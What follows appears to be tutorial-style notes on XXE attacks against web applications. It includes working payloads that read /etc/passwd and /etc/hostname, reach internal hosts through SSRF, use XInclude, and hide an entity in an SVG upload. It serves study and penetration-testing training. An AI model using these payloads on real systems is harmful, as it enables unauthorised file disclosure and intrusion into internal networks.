
# XXE:
Web security vulnerability that allows an attacker to interfere with an application's processing of XML data. 
It often allows an attacker to view files on the application server filesystem, and to interact with any back-end or external systems that the application itself can access.

There are various types of XXE attacks:

-Exploiting XXE to retrieve files, where an external entity is defined containing the contents of a file, and returned in the application's response.

-Exploiting XXE to perform SSRF attacks, where an external entity is defined based on a URL to a back-end system.

-Exploiting blind XXE exfiltrate data out-of-band, where sensitive data is transmitted from the application server to a system that the attacker controls.

-Exploiting blind XXE to retrieve data via error messages, where the attacker can trigger a parsing error message containing sensitive data.

# PREVENT XXE:

Disable thos feature that you don't need in your XML library

# General Payload to acces filesystem

Suppose a shopping application checks for the stock level of a product by submitting the following XML to the server:
```
<?xml version="1.0" encoding="UTF-8"?>
<stockCheck><productId>381</productId></stockCheck>
```
The application performs no particular defenses against XXE attacks, so you can exploit the XXE vulnerability to retrieve the /etc/passwd file by submitting the following XXE payload:
```
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>   (Note that you use file://)
<stockCheck><productId>&xxe;</productId></stockCheck>
```
# Exploiting XXE to perform SSRF attacks

If you can use the defined entity within a data value that is returned in the application's response, then you will be able to view the response from the URL within the application's response, and so gain two-way interaction with the back-end system. If not, then you will only be able to perform blind SSRF attacks. 
```
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://internal.vulnerable-website.com/"> ]>
```
# BLIND SSRF XXE(XInclude)

Some applications receive client-submitted data, embed it on the server-side into an XML document, and then parse the document. An example of this occurs when client-submitted data is placed into a back-end SOAP request, which is then processed by the backend SOAP service.

In this situation, you cannot carry out a classic XXE attack, because you don't control the entire XML document and so cannot define or modify a DOCTYPE element. However, you might be able to use XInclude instead. XInclude is a part of the XML specification that allows an XML document to be built from sub-documents. You can place an XInclude attack within any data value in an XML document, so the attack can be performed in situations where you only control a single item of data that is placed into a server-side XML document.

To perform an XInclude attack, you need to reference the XInclude namespace and provide the path to the file that you wish to include. For example:
```
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>
```
# XXE attacks via file upload

An application might allow users to upload images, and process or validate these on the server after they are uploaded. Even if the application expects to receive a format 
like PNG or JPEG, the image processing library that is being used might support SVG images. Since the SVG format uses XML, an attacker can submit a malicious SVG image 
and so reach hidden attack surface for XXE vulnerabilities. 

Payload:
```
<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>
```
# Test XXE via Content-Type
Most POST requests use a default content type that is generated by HTML forms, such as `application/x-www-form-urlencoded`. Some web sites expect to receive requests in this format but will tolerate other content types, including XML.

For example, if a normal request contains the following:
```
POST /action HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 7

foo=bar
```
Then you might be able submit the following request, with the same result:
```
POST /action HTTP/1.0
Content-Type: text/xml
Content-Length: 52

<?xml version="1.0" encoding="UTF-8"?><foo>bar</foo>
```
